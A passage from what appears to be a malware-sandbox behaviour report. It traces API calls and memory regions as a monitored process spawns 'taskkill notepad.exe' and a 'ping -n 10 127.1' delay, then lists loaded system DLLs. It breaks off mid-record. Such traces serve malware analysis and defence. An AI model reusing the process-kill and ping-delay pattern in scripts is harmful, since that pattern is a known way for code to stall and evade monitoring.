[0057.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0057.640] LocalAlloc (uFlags=0x40, uBytes=0x5f) returned 0xfc84a8 [0057.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xfc84a8, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 95 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _write (in: _FileHandle=1, _Buf=0xfc84a8*, _MaxCharCount=0x5e | out: _Buf=0xfc84a8*) returned 94 [0057.640] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0057.640] LocalFree (hMem=0xfc84a8) returned 0x0 [0057.641] LocalFree (hMem=0xfc83e0) returned 0x0 [0057.641] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xf3ef60, nSize=0x0, Arguments=0xf3ef5c | out: lpBuffer="菠üóᨧ\x94䰨盪❓") returned 0x61 [0057.641] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.641] _fileno (_File=0x76ea4c28) returned 1 [0057.641] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.641] GetFileType (hFile=0x28) returned 0x2 [0057.641] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3ef24 | out: lpMode=0xf3ef24) returned 0 [0057.641] GetLastError () returned 0x6 [0057.641] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ee88, nSize=0x50 | out: lpBuffer="ó❓") returned 0x0 [0057.641] _fileno (_File=0x76ea4c28) returned 1 [0057.641] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0057.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0057.641] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xfc84b0 [0057.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xfc84b0, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0057.641] _fileno (_File=0x76ea4c28) returned 1 [0057.641] _write (in: _FileHandle=1, _Buf=0xfc84b0*, _MaxCharCount=0x61 | out: _Buf=0xfc84b0*) returned 97 [0057.641] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.641] _fileno (_File=0x76ea4c28) returned 1 [0057.641] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0057.641] LocalFree (hMem=0xfc84b0) returned 0x0 [0057.641] LocalFree (hMem=0xfc83e0) returned 0x0 [0057.641] IcmpCloseHandle (IcmpHandle=0xfb6bb8) returned 1 [0057.641] LocalFree (hMem=0xfbc340) returned 0x0 [0057.641] LocalFree (hMem=0xfc5270) returned 0x0 [0057.641] WSACleanup () returned 0 [0057.642] exit (_Code=0) Thread: id = 64 os_tid = 0x4d8 Thread: id = 65 os_tid = 0x9dc Process: id = "38" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x12c5d000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "taskkill notepad.exe" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1734 start_va = 0x490000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1735 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1736 start_va = 0x4c0000 end_va = 0x4cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1737 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1738 start_va = 0x510000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1739 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1740 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1741 start_va = 0x570000 end_va = 0x571fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1742 start_va = 0x930000 end_va = 0x945fff entry_point = 0x930000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1743 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1744 start_va = 0x7f5b0000 end_va = 0x7f5d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5b0000" filename = "" Region: id = 1745 start_va = 0x7f5d4000 end_va = 0x7f5d4fff entry_point = 0x0 region_type = private name = "private_0x000000007f5d4000" filename = "" Region: id = 1746 start_va = 0x7f5dc000 end_va = 0x7f5defff entry_point = 0x0 region_type = private name = "private_0x000000007f5dc000" filename = "" Region: id = 1747 start_va = 0x7f5df000 end_va = 0x7f5dffff entry_point = 0x0 region_type = private name = "private_0x000000007f5df000" filename = "" Region: id = 1748 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1749 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1750 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1751 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1754 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1755 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1756 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1757 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1758 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1759 start_va = 0x4a0000 end_va = 0x4a3fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1760 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1761 start_va = 0x6b0000 end_va = 0x72dfff entry_point = 0x6b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1762 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1763 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1764 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1765 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1766 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1767 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1768 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1769 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1770 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1771 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1772 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1773 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1774 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1775 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1776 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1777 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1778 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1779 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1780 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1781 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1782 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1783 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1784 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1785 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1786 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1787 start_va = 0x7f4b0000 end_va = 0x7f5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4b0000" filename = "" Region: id = 1788 start_va = 0x4b0000 end_va = 0x4b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1789 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1790 start_va = 0x590000 end_va = 0x593fff entry_point = 0x590000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1791 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1792 start_va = 0x730000 end_va = 0x730fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1793 start_va = 0x750000 end_va = 0x753fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1794 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1795 start_va = 0x770000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1796 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1797 start_va = 0x950000 end_va = 0xad7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1798 start_va = 0xae0000 end_va = 0xc60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1799 start_va = 0xc70000 end_va = 0x206ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 1800 start_va = 0x2070000 end_va = 0x2344fff entry_point = 0x2070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1801 start_va = 0x2350000 end_va = 0x274bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002350000" filename = "" Region: id = 1802 start_va = 0x734b0000 end_va = 0x73510fff entry_point = 0x734b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1803 start_va = 0x73520000 end_va = 0x7352bfff entry_point = 0x73520000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1804 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1805 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1806 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1807 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1808 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1809 start_va = 0x73460000 end_va = 0x734a1fff entry_point = 0x73460000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Thread: id = 66 os_tid = 0xa98 Process: id = "39" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x7269000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 10 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1811 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1812 start_va = 0xd40000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 1813 start_va = 0xd60000 end_va = 0xd61fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 1814 start_va = 0xd70000 end_va = 0xd7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 1815 start_va = 0xd80000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 1816 start_va = 0xdc0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1817 start_va = 0xe00000 end_va = 0xe03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 1818 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 1819 start_va = 0xe20000 end_va = 0xe21fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1820 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1821 start_va = 0x7f8f0000 end_va = 0x7f912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8f0000" filename = "" Region: id = 1822 start_va = 0x7f913000 end_va = 0x7f913fff entry_point = 0x0 region_type = private name = "private_0x000000007f913000" filename = "" Region: id = 1823 start_va = 0x7f91c000 end_va = 0x7f91efff entry_point = 0x0 region_type = private name = "private_0x000000007f91c000" filename = "" Region: id = 1824 start_va = 0x7f91f000 end_va = 0x7f91ffff entry_point = 0x0 region_type = private name = "private_0x000000007f91f000" filename = "" Region: id = 1825 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1826 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1827 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1828 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1829 start_va = 0xee0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1830 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1831 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1832 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1833 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 1834 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1835 start_va = 0xe30000 end_va = 0xeadfff entry_point = 0xe30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1836 start_va = 0xf30000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1837 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1838 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1839 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1840 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1841 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1842 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1843 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1844 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1845 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1846 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1847 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1848 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1849 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1850 start_va = 0x7f7f0000 end_va = 0x7f8effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7f0000" filename = "" Region: id = 1851 start_va = 0xef0000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1852 start_va = 0x1030000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1853 start_va = 0x7f919000 end_va = 0x7f91bfff entry_point = 0x0 region_type = private name = "private_0x000000007f919000" filename = "" Region: id = 1854 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1855 start_va = 0xd60000 end_va = 0xd62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 1856 start_va = 0xeb0000 end_va = 0xeb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 1857 start_va = 0xec0000 end_va = 0xec2fff entry_point = 0xec0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 1858 start_va = 0x1070000 end_va = 0x10affff 